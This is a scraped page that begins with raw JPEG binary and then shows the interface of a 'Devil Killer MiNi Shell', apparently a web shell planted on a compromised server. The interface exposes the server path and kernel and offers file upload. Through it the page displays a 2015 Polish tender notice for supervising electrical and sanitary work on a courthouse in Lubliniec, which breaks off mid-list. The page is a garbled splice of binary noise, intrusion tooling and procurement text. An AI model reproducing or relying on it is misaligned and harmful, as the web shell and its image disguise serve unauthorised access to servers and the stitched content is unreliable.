JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150916/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150916/136511-N-2015.html

<p class="kh_header"><b>Częstochowa: Usługi - Pełnienie funkcji inspektora nadzoru inwestorskiego nad wykonaniem robót budowlanych w zakresie instalacji elektrycznych i/lub instalacji sanitarnych, realizowanych na podstawie dokumentacji projektowo - kosztorysowej dla zadania pn. Przebudowa budynku Sądu Rejonowego w Lublińcu przy ul. Sobieskiego 8</b><br>
<b>Numer ogłoszenia: 136511 - 2015; data zamieszczenia: 16.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Okręgowy w Częstochowie , ul. Dąbrowskiego 23/35, 42-200 Częstochowa, woj. śląskie, tel. 34 36 84 430, faks 34 36 84 440.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.czestochowa.so.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi - Pełnienie funkcji inspektora nadzoru inwestorskiego nad wykonaniem robót budowlanych w zakresie instalacji elektrycznych i/lub instalacji sanitarnych, realizowanych na podstawie dokumentacji projektowo - kosztorysowej dla zadania pn. Przebudowa budynku Sądu Rejonowego w Lublińcu przy ul. Sobieskiego 8.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia w niniejszym postępowaniu są usługi dotyczące pełnienia nadzoru inwestorskiego nad wykonaniem robót budowlanych w zakresie:
1.1. Zadanie A - instalacji elektrycznych - wartość robót wg kosztorysu inwestorskiego to 724 244,00 zł
1.2. Zadanie B - instalacji  sanitarnych (wodno - kanalizacyjnej, c.o., wentylacyjnej i klimatyzacyjnej) - wartość robót wg kosztorysu inwestorskiego to 934 338,00 zł, 
realizowanych na podstawie dokumentacji projektowo - kosztorysowej dla zadania inwestycyjnego pn. Przebudowa budynku Sądu Rejonowego w Lublińcu przy ul. Sobieskiego 8. Elementy dokumentacji dotyczące zakresów robót objętych każdym z zadań A i B stanowią odpowiednio załączniki 2.A. i 2.B. do niniejszej SIWZ.
Przebudowywany budynek Sądu Rejonowego w Lublińcu jest objęty ochroną konserwatorską, wymieniony w grupie obiektów zabytkowych i figuruje w gminnej ewidencji zabytków. 
Pełna dokumentacja dotycząca przebudowy ww. budynku zamieszczona została na stronie internetowej Zamawiającego, w związku z ogłoszonym postępowaniem na roboty budowlane związane z realizacją zadania (nr postępowania IR-260-07.2015).
2. Do obowiązków inspektora nadzoru inwestorskiego należało będzie:
1) zapoznanie się z treścią umowy o roboty budowlane,
2) udział w protokolarnym przekazaniu wykonawcy robót budowlanych placu budowy, 
3) rozwiązywanie przy udziale Zamawiającego wszelkich problemów i sporów związanych z realizacją robót budowlanych, w szczególności w zakresie zamiennych rozwiązań i materiałów, wad dokumentacji projektowej, rozliczaniem zrealizowanych robót, 
4) uczestnictwo i dokonywanie w imieniu Zamawiającego odbiorów budowlanych, w tym odbiorów częściowych i na roboty zanikające,    
5) udział w próbach i odbiorach technicznych zainstalowanych urządzeń,
6) sprawdzenie i gromadzenie posiadanych przez wykonawcę robót budowlanych dokumentów (atestów, świadectw jakości, wyników badań) dotyczących wbudowanych materiałów i urządzeń, 
7) kontrola postępu, terminowości i jakości wykonywanych robot oraz prawidłowości prowadzenia dziennika budowy i dokonywanie w nim wpisów stwierdzających wszelkie okoliczności mające znaczenie dla właściwego wykonania robót budowlanych, 
8) kontrola zgodności wykonywanych robot z dokumentacją projektową,
9) uczestnictwo w cotygodniowych naradach koordynacyjnych na placu budowy, a także stawianie się, na żądanie Zamawiającego, gdy zaistnieje taka potrzeba, potwierdzone wpisem do dziennika budowy,
10) dokonywanie weryfikacji kosztów i końcowego rozliczenia robót instalacji elektrycznych / sanitarnych, 
11) reprezentowanie Zamawiającego w uzgodnieniach z gestorami sieci,
12) ... pobyt/y tygodniowo (kryterium oceniane) na budowie w trakcie prowadzenia robót budowlanych  objętych nadzorem Wykonawcy, potwierdzone wpisem w dzienniku budowy,
13) opiniowanie wniosków wykonawcy robót budowlanych w zakresie konieczności wykonania robót zamiennych, o ile zaistnieje potrzeba ich wykonania, 
14) sprawdzanie poprawności i opracowania dokumentacji powykonawczej oraz ocena jej zgodności z faktycznie wykonanymi robotami budowlanymi, 
15) w przypadku przerwania robót budowlanych przez ich wykonawcę, przeprowadzenie inwentaryzacji wykonanych robót budowlanych, 
16) w przypadku odstąpienia od umowy przez wykonawcę robót budowlanych, wykonywanie wszelkich czynności związanych z odstąpieniem, w tym udział w przejęciu placu budowy, nadzór nad robotami zabezpieczającymi, 
17) przygotowanie materiałów koniecznych do dokonania odbioru końcowego, w szczególności: 
a) potwierdzanie w dzienniku budowy gotowości obiektu do odbioru końcowego, 
b) kontrola w zakresie kompletności dokumentacji powykonawczej, 
c) kontrola w zakresie skompletowania dokumentacji wyposażenia i urządzeń (karty gwarancyjne, instrukcje itd.) 
d) koordynacja odbiorów specjalistycznych, w tym między innymi Państwowej Straży Pożarnej, dostawców mediów.
18) udział w odbiorze końcowym inwestycji oraz odbiorach pogwarancyjnych, a także wyrażanie opinii branżowych w okresie gwarancji i rękojmi, o ile zajdzie taka potrzeba.
19) po dokonaniu odbioru końcowego do obowiązków Wykonawcy należeć będzie: 
a) dokończenie zadań wynikających z zakończenia budowy, 
b) nadzór nad robotami związanych z usuwaniem wad, 
c) odbiór wykonanych robót związanych z usunięciem wad, 
d) współpraca z Zamawiającym w kwestii roszczeń i sporów, 
20) obowiązki Wykonawcy wymienione w pkt 1) ÷ 19) dotyczą robót budowlanych w branży, który objęty jest nadzorem Wykonawcy tj. zadanie A - instalacje elektryczne; zadanie B - instalacje sanitarne.  
21) Wykonawca zobowiązany będzie przestrzegać bieżących instrukcji i wskazówek Zamawiającego oraz informować Zamawiającego o wszystkich istotnych sprawach, a w szczególności o dostrzeżonych uchybieniach w realizacji robót instalacyjnych, wszelkich zdarzeniach, które będą miały lub będą mogły mieć wpływ na prawidłowe wykonanie robót.
22) wszystkie uwagi, polecenia w stosunku do wykonawcy robót budowlanych, a także stwierdzone fakty, Wykonawca zobowiązany będzie wpisywać na bieżąco w dzienniku budowy.
3. Wspólny słownik zamówień CPV:
71247000-1 - nadzór nad robotami budowlanymi
71520000-9 - usługi nadzoru budowlanego
4. Termin wykonania zamówienia
4.1. Wykonawca rozpocznie świadczenie usług objętych niniejszym zamówieniem od dnia protokolarnego przekazania placu budowy do dnia uzyskania przez Zamawiającego ostatecznej decyzji o pozwoleniu na użytkowanie budynku po przebudowie.
4.2. Planowany termin zakończenia robót budowlanych określa się na 20 miesięcy od dnia przekazania terenu budowy. Harmonogram finansowo - rzeczowy, ustalający szczegółowo zakres, wartość i terminy realizacji poszczególnych etapów robót budowlanych, zostanie ustalony po wyborze oferty najkorzystniejszej w postępowaniu na wybór Wykonawcy robót budowlanych a przed podpisaniem umowy o roboty budowlane..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 20.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Przystępując do złożenia oferty Wykonawca zobowiązany jest do wniesienia wadium. 
2. Wadium  należy  wnieść przed upływem terminu składania ofert. Wadium wniesione w formie pieniądza (przelew na konto), winno znajdować się na koncie Zamawiającego nie później niż w ostatecznym terminie (dzień i godzina), wyznaczonym do złożenia oferty w niniejszym postępowaniu.
3. Zamawiający ustala wadium na kwotę:
3.1. Zadanie A - 800,00 zł (słownie: osiemset złotych 00/100),
3.2. Zadanie B - 1 000,00 zł (słownie: tysiąc złotych 00/100),
4. Wadium musi obejmować okres związania ofertą, tj. 30 dni. Pierwszym dniem terminu związania ofertą jest dzień składania ofert.
5. Wadium może być wniesione w następujących formach: 
a) w pieniądzu, przelewem na rachunek bankowy Zamawiającego: Bank Gospodarstwa Krajowego w Warszawie, Oddział w Katowicach, nr konta: 85 1130 1017 0021 1000 4490 0004 - Sumy depozytowe Minister Finansów - Sąd Okręgowy w Częstochowie;
b) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
c) w gwarancjach bankowych, bezwarunkowych, nieodwołalnych, płatnych na pierwsze żądanie;
d) w gwarancjach ubezpieczeniowych, bezwarunkowych, nieodwołalnych, płatnych na pierwsze żądanie;
e) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 ze zm.).
6. Wykonawca w treści oferty wskazuje sposób wniesienia wadium. 
7. W poleceniu przelewu należy zaznaczyć, że wpłata dotyczy przedmiotowego postępowania. W pozostałych przypadkach wymagane jest złożenie wadium w miejscu składania ofert.
8. Zaleca się, aby wykonawca załączył do oferty oryginał lub kserokopię polecenia przelewu. Zamawiający nie dopuszcza składania wadium w ofercie.
9. Dokumenty, o których mowa w punkcie 5. (b), (c), (d) i (e) muszą zachowywać ważność przez cały okres, w którym Wykonawca jest związany ofertą.
10. W przypadku wnoszenia wadium przelewem na rachunek bankowy, o terminie jego wniesienia decydować będzie data uznania rachunku bankowego Zamawiającego,  podanego w pkt 5 (a) niniejszego rozdziału SIWZ.
11. Poręczenie i/lub gwarancja musi zawierać:
11.1. klauzulę o nieodwołalności i bezwarunkowości wypłaty przez Gwaranta (Poręczyciela) na pisemne żądanie Zamawiającego pełnej kwoty wadium w przypadkach wymienionych w ustawie - Prawo zamówień publicznych; 
11.2. termin obowiązywania gwarancji/poręczenia do końca okresu związania ofertą na kwotę 800,00 złotych (zadanie A) lub 1 000,00 złotych (zadanie B);
11.3. informację, że udzielona gwarancja/poręczenie stanowi zabezpieczenie na wadium na rzecz Zamawiającego, dotyczące postępowania prowadzonego w trybie przetargu nieograniczonego, znak sprawy: IR-260-08.2015 pn.: Usługi - Pełnienie funkcji inspektora nadzoru inwestorskiego nad wykonaniem robot budowlanych w zakresie instalacji elektrycznych (zadanie A) lub instalacji sanitarnych (zadanie B), realizowanych na podstawie dokumentacji projektowo - kosztorysowej dla zadania pn. Przebudowa budynku Sądu Rejonowego w Lublińcu przy ul. Sobieskiego 8
11.4. zobowiązanie zgodne z art. 46 ust. 4a ustawy - Prawo zamówień publicznych: Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
11.5. zobowiązanie zgodne z art. 46 ust. 5 ustawy - Prawo zamówień publicznych:
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca którego oferta została wybrana: 
a) odmówił podpisania umowy w sprawie Zamówienia  na warunkach określonych w ofercie,
b) nie wniósł wymaganego  zabezpieczenia należytego wykonania Umowy,
c) zawarcie umowy w sprawie Zamówienia stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
12. Okoliczności i zasady zwrotu wadium oraz zasady jego zaliczenia na poczet zabezpieczenia należytego wykonania Umowy określa art. 46 ustawy.
13. Dowód wniesienia wadium (kopia przelewu lub dowodu wpłaty lub oryginał w przypadku wniesienia wadium w formie innej niż pieniądz) należy dołączyć do oferty. 
W przypadku wniesienia wadium w formie innej niż pieniądz, Zamawiająca dopuszcza wpięcie w ofertę potwierdzonej kopii dowodu wniesienia wadium. W takim przypadku oryginał tegoż dokumentu winien zostać złożony w jednej kopercie z ofertą. Trwałe spięcie oryginału przedmiotowego dokumentu wraz z ofertą uniemożliwi Zamawiającemu jego zwrot po dokonaniu wyboru oferty najkorzystniejszej.
Wadium w kwocie określonej w SIWZ, wniesione w formie innej niż pieniądz musi obejmować termin związania ofertą tj. 30 dni od terminu składania ofert.
14. UWAGA
Zamawiający nie dopuszcza innych zapisów w treści gwarancji lub poręczeń (niż wynikające z odrębnych ogólnie obowiązujących przepisów, które winny być wówczas powołane), w tym zapisów dotyczących pośrednictwa banku w przypadku konieczności wypłaty należności, które mogłyby utrudnić Zamawiającemu realizację swoich praw do zatrzymania wadium, wynikających z zapisów ustawy w art. 46 ust. 4a i 5.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie wykonał co najmniej:  
b)1. zadanie A - dwie usługi nadzoru inwestorskiego, mające w swoim zakresie usługi nadzoru inwestorskiego w zakresie instalacji elektrycznych, dotyczących robót budowlanych związanych z realizowaniem inwestycji o wartości nie mniejszej niż 3 000 000,00 złotych  (z wyłączeniem hal produkcyjnych, hal sportowych, hal wystawienniczych i hal handlowych) - dla każdej z wymaganych dwóch usług - w ramach jednej, odrębnej umowy/kontraktu.
b)2. zadanie B - dwie usługi nadzoru inwestorskiego, mające w swoim zakresie usługi nadzoru inwestorskiego w zakresie instalacji sanitarnych - wodno-kanalizacyjnych, centralnego ogrzewania, wentylacji i klimatyzacji, dotyczących robót budowlanych związanych z realizowaniem inwestycji o wartości nie mniejszej niż 3 000 000,00 złotych  (z wyłączeniem hal produkcyjnych, hal sportowych, hal wystawienniczych i hal handlowych) - dla każdej z wymaganych dwóch usług - w ramach jednej, odrębnej umowy/kontraktu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej nw. osobami, posiadającymi uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie w poniżej określonych specjalnościach:
c)1. zadanie A - jedną osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i niskoprądowych, urządzeń energetycznych - inspektor nadzoru inwestorskiego w zakresie robót branży elektrycznej;
c)2. zadanie B - jedną osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych - inspektor nadzoru inwestorskiego w zakresie robót branży sanitarnej;
W przypadku podpisania umowy z Wykonawcą, do sprawowania samodzielnych funkcji technicznych dopuszczone zostaną przez Zamawiającego wyłącznie osoby, które posiadają odpowiednie uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie - zgodnie z ustawą Prawo Budowlane. Samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
